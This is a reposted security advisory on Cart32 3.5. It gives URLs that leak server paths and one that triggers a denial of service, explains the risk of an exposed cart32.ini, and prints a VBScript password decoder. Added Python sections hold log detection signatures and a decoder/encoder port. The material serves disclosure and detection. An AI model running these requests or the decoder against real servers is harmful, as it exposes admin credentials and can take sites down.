Vulnerable systems:
Cart32 version 3.5 and below
Immune systems:
Cart32 version 3.5a
The Cart32 shopping cart application is a Win32 executable that resides on a web server as cart32.exe and c32web.exe. There are a number of parameters that can be passed to these CGI applications that will reveal server information, namely physical paths to the web root, physical paths to the Windows directory, and physical paths to the program files directory. The following URLs demonstrate this problem:
- http://www.example.com/cgi-bin/cart32.exe/error
- http://www.example.com/cgi-bin/c32web.exe/ShowAdminDir
- http://www.example.com/cgi-bin/c32web.exe/CheckError?error=53
Cart32 is also vulnerable to a denial of service: requesting the following URL drives processor usage on the server to 100%:
- http://www.example.com/cgi-bin/c32web.exe/ShowProgress
Cart32 has issued version 3.5a, which addresses most of these issues; it is available from their web site (www.cart32.com).
Another problem is that many people (often as set up by their ISP or web hosting company) put the cart32.ini file in the same directory as cart32.exe and c32web.exe. If that file is in that directory and is readable over the web, much more information can be revealed about the server, especially if the Debug section exists in that file. Cart32.ini contains a very lightly encrypted admin password and server configuration information.
The Debug section can contain plaintext passwords, server environment variables, and other sensitive information. The issue of leaving cart32.ini in a web-accessible directory has been publicly discussed in the past, and Cart32 does have a KB article about it, but it is still a very common problem, as any search engine will reveal. This issue needs to be readdressed, especially considering the weakness of their encryption.
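The information-disclosure URLs, the ShowProgress denial of service and the exposed cart32.ini described above all show up as plain GET requests in the web server log. The following is an added example, not part of Xato's advisory or of Cart32: detection logic that parses IIS W3C extended log lines and flags those requests. The log lines are constructed for the example (the column set named in the #Fields: header and the client addresses are assumptions, not captured traffic), and the signature names are mine. Matching is deliberately case-insensitive so that a request for CART32.INI is not missed.

```python
import re
from typing import Dict, List

# Constructed sample log in IIS W3C extended format (not real traffic).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-07-27 16:40:01 203.0.113.7 GET /cgi-bin/cart32.exe/error - 200
2001-07-27 16:40:05 203.0.113.7 GET /cgi-bin/c32web.exe/ShowAdminDir - 200
2001-07-27 16:40:09 203.0.113.7 GET /cgi-bin/c32web.exe/CheckError error=53 200
2001-07-27 16:41:30 198.51.100.9 GET /cgi-bin/cart32.exe - 200
2001-07-27 16:42:00 203.0.113.7 GET /cgi-bin/cart32.ini - 200
2001-07-27 16:42:10 203.0.113.7 GET /cgi-bin/c32web.exe/ShowProgress - 200
"""

# (signature name, pattern applied to cs-uri-stem). The URL forms are the ones
# given in the advisory; the signature names are assumptions for this example.
SIGNATURES = [
    ("cart32-error-path-disclosure", re.compile(r"/cart32\.exe/error$", re.I)),
    ("cart32-showadmindir", re.compile(r"/c32web\.exe/showadmindir$", re.I)),
    ("cart32-checkerror", re.compile(r"/c32web\.exe/checkerror$", re.I)),
    ("cart32-showprogress-dos", re.compile(r"/c32web\.exe/showprogress$", re.I)),
    ("cart32-ini-fetch", re.compile(r"/cart32\.ini$", re.I)),
]


def parse_w3c(text: str) -> List[Dict[str, str]]:
    """Parse W3C extended log lines into dicts keyed by the #Fields: names."""
    fields: List[str] = []
    records: List[Dict[str, str]] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line.split()[1:]
            continue
        values = line.split()
        if not fields or len(values) != len(fields):
            continue  # malformed or pre-header line: skip rather than guess
        records.append(dict(zip(fields, values)))
    return records


def detect_cart32_abuse(text: str) -> List[Dict[str, str]]:
    """Return one hit per log record whose URI stem matches a signature."""
    hits: List[Dict[str, str]] = []
    for rec in parse_w3c(text):
        stem = rec.get("cs-uri-stem", "")
        for name, pattern in SIGNATURES:
            if pattern.search(stem):
                hits.append({
                    "signature": name,
                    "client": rec.get("c-ip", "?"),
                    "stem": stem,
                    "query": rec.get("cs-uri-query", "-"),
                    "status": rec.get("sc-status", "?"),
                })
                break
    return hits


def ini_exposed(text: str) -> bool:
    """True when a request for cart32.ini was answered with a 2xx status:
    the file is readable over HTTP, which is the misconfiguration the
    advisory describes. A 403 or 404 on the same path is the expected state."""
    return any(
        h["signature"] == "cart32-ini-fetch" and h["status"].startswith("2")
        for h in detect_cart32_abuse(text)
    )


if __name__ == "__main__":
    for h in detect_cart32_abuse(SAMPLE_LOG):
        print(f'{h["signature"]:30} {h["client"]:15} {h["stem"]} {h["query"]} {h["status"]}')
    print("cart32.ini readable over HTTP:", ini_exposed(SAMPLE_LOG))
```

The probe and DoS signatures are worth alerting on from any client; the cart32.ini signature is only a finding when the status is 2xx, which is what `ini_exposed` checks, since a 404 there means the file is already out of the web root.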
On November 6, 2000 Colin Hart and Cart32 issued a joint advisory addressing the issue of the weak encryption. They also stated that they would not be releasing the actual algorithm. Because Xato does not agree with the concept of security through obscurity, Xato has put together this snippet of VBScript code to demonstrate how a password can be decrypted:
' Cart32Decode: recovers the plaintext from a Cart32 "encrypted" password.
' Every output character is read from a fixed position of the stored string
' and shifted down by a fixed amount, so the scheme is a static transposition
' plus a per-position shift, with no key. Mid(sPass, n) with no length argument
' returns the tail of the string from position n and Asc() takes its first
' character, so the input must be at least 15 characters long. Position 2 is
' read twice and position 16 is never read, exactly as in the snippet as posted.
Function Cart32Decode(sPass)
    Cart32Decode = Chr(Asc(Mid(sPass, 8)) - 12) & _
        Chr(Asc(Mid(sPass, 5)) - 8) & _
        Chr(Asc(Mid(sPass, 3)) - 16) & _
        Chr(Asc(Mid(sPass, 15)) - 15) & _
        Chr(Asc(Mid(sPass, 9)) - 9) & _
        Chr(Asc(Mid(sPass, 1)) - 12) & _
        Chr(Asc(Mid(sPass, 4)) - 3) & _
        Chr(Asc(Mid(sPass, 11)) - 5) & _
        Chr(Asc(Mid(sPass, 13)) - 11) & _
        Chr(Asc(Mid(sPass, 6)) - 5) & _
        Chr(Asc(Mid(sPass, 2)) - 1) & _
        Chr(Asc(Mid(sPass, 2)) - 1) & _
        Chr(Asc(Mid(sPass, 14)) - 13) & _
        Chr(Asc(Mid(sPass, 12)) - 10) & _
        Chr(Asc(Mid(sPass, 10)) - 6) & _
        Chr(Asc(Mid(sPass, 7)) - 8)
End Function

' Usage: cscript cart32decode.vbs <stored-password>
WScript.Echo Cart32Decode(WScript.Arguments(0))
As mentioned in Colin Hart's advisory, version 3.5a will fix this problem.
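To make the weakness concrete, here is an added example that is not part of Xato's advisory or of Cart32: a Python port of the decode table from the VBScript snippet above, together with the inverse derived from it. Because the decoder is a fixed permutation plus fixed shifts with no key, anyone who can read the stored string can reverse it, and anyone who knows the table can also produce a stored string for a chosen password. Two properties follow directly from the snippet as posted and are preserved here: plaintext positions 11 and 12 are both read from stored position 2, so only passwords with those two characters equal have an encoding; and stored position 16 is never read, so the encoder fills it with a placeholder. The 16-character stored length and the filler character are my assumptions, and the stored/plaintext pair used below is constructed for the example, not real Cart32 data.

```python
from typing import List, Optional

# Each entry is (1-based position read from the stored string, amount subtracted),
# in output order, transcribed from the VBScript Cart32Decode snippet.
DECODE_TABLE = [
    (8, 12), (5, 8), (3, 16), (15, 15), (9, 9), (1, 12), (4, 3), (11, 5),
    (13, 11), (6, 5), (2, 1), (2, 1), (14, 13), (12, 10), (10, 6), (7, 8),
]
STORED_LEN = 16  # assumption: the snippet reads positions 1..15 and ignores 16


def cart32_decode(stored: str) -> str:
    """Recover the plaintext from a stored Cart32 password string.

    Mirrors the VBScript: it indexes positions 1..15, so shorter input is an
    error there (Asc("") fails) and is rejected here explicitly.
    """
    if len(stored) < 15:
        raise ValueError("stored password must be at least 15 characters")
    return "".join(chr(ord(stored[pos - 1]) - delta) for pos, delta in DECODE_TABLE)


def cart32_encode(plain: str, filler: str = "0") -> str:
    """Inverse of cart32_decode, obtained by inverting the table.

    Raises ValueError when two plaintext positions that share a stored
    position (11 and 12, both from stored position 2) disagree, because no
    stored string can then decode to this plaintext. Stored position 16 is
    never read by the decoder, so it is set to `filler` (an assumption).
    """
    if len(plain) != len(DECODE_TABLE):
        raise ValueError(f"plaintext must be exactly {len(DECODE_TABLE)} characters")
    stored: List[Optional[str]] = [None] * STORED_LEN
    for out_idx, (pos, delta) in enumerate(DECODE_TABLE):
        ch = chr(ord(plain[out_idx]) + delta)
        if stored[pos - 1] is not None and stored[pos - 1] != ch:
            raise ValueError(
                f"plaintext position {out_idx + 1} conflicts with an earlier "
                f"position that also maps to stored position {pos}; not encodable"
            )
        stored[pos - 1] = ch
    return "".join(filler if c is None else c for c in stored)


def is_encodable(plain: str) -> bool:
    """True when some stored string decodes to `plain` under this table."""
    try:
        cart32_encode(plain)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed pair for demonstration (not taken from any real cart32.ini).
    stored = ">ObDIN9O<6I:X?c0"
    plain = cart32_decode(stored)
    print(f"stored  : {stored}")
    print(f"decoded : {plain}")
    print(f"re-encoded matches: {cart32_encode(plain) == stored}")
    print(f"'CART32ADMINX2001' encodable: {is_encodable('CART32ADMINX2001')}")
```

Shifting by a fixed amount can push characters outside the printable range (for instance a letter late in the alphabet at plaintext position 3 lands above 0x7E), which is one more sign that this is an obfuscation rather than a cipher: nothing in it depends on a secret.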
Solution:
Cart32 was first notified of these problems on August 28, 2000. Cart32 has issued a version 3.5a release that addresses some of these issues but not all of them. If using Cart32 you should carefully read the knowledge base articles available on their web site.
[This message was edited by MoHicAn on 07-27-2001 at 04:47 PM GMT]